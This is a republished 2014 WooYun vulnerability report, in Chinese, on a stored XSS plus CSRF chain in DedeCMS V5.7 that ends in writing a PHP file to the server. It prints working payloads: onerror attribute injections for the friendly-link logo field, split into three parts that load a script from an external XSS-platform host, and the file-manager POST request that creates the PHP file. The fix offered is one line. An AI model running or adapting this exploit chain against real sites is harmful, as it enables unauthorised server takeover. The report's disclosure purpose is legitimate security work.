DedeCMS csrf getshell 无需会员中心
- 发布时间:2014-06-20
- 公开时间:2014-09-18
- 漏洞类型:xss
- 危害等级:高
- 漏洞编号:WooYun-2014-65561
- 测试版本:V5.7-UTF8-SP1 20140612
简要描述
最近csrf又火了哈,各种csrf脱裤。dede后台挺方便就直接写getshell了 一直在白盒今天试试黑盒 结果发现了这个问题 不用注册,3条请求getshell详细说明
在黑盒测试友情链接功能的时候发现filter的一个bug 网站logo处提交">_<'"<>发现后台显示logo时居然成功引入了双引号闭合了src属性。"
就能成功闭合双引号
于是提交测试代码
'" onerror=alert(1);//
漏洞证明
先用xss平台创建一个项目,然后自定义代码这里用的pkav的post get模块POST **.**.**.**/dede/file_manage_control.php
fmdo=edit&backurl=&activepath=&filename=csrf.php&str=%3C%3Fphp+phpinfo%28%29%3B%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++
因为此处字符长度有限制 所以将payload拆分为3段提交
'" onerror=s.src='http://xss平台/KCfTiA';//
'" onerror=body.appendChild(s);//
'" onerror=s=createElement('script');//
注意显示的顺序与提交的顺序是相反的 所以要把payload顺序倒过来
提交完后访问后台友情链接模块
修复方案
xss 过滤关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 逐梦苍穹 习近平引领航天强国建设 4937350
- 2 下一个被淘汰的电子产品是什么 4969293
- 3 重庆多地禁办“无事酒”背后 4845897
- 4 解码首季经济成绩单 4761029
- 5 余承东把问界M9送到360楼下 4641999
- 6 周扬青对韩雪说不要倚老卖老 4547487
- 7 神十八点火瞬间航天员齐刷刷敬礼 4408858
- 8 00后小伙约嫖60后大妈被抓 4388056
- 9 深圳部分区域将取消限购不实 4271579
- 10 兔兔被抓起强吻吓得嗷嗷大叫 4174071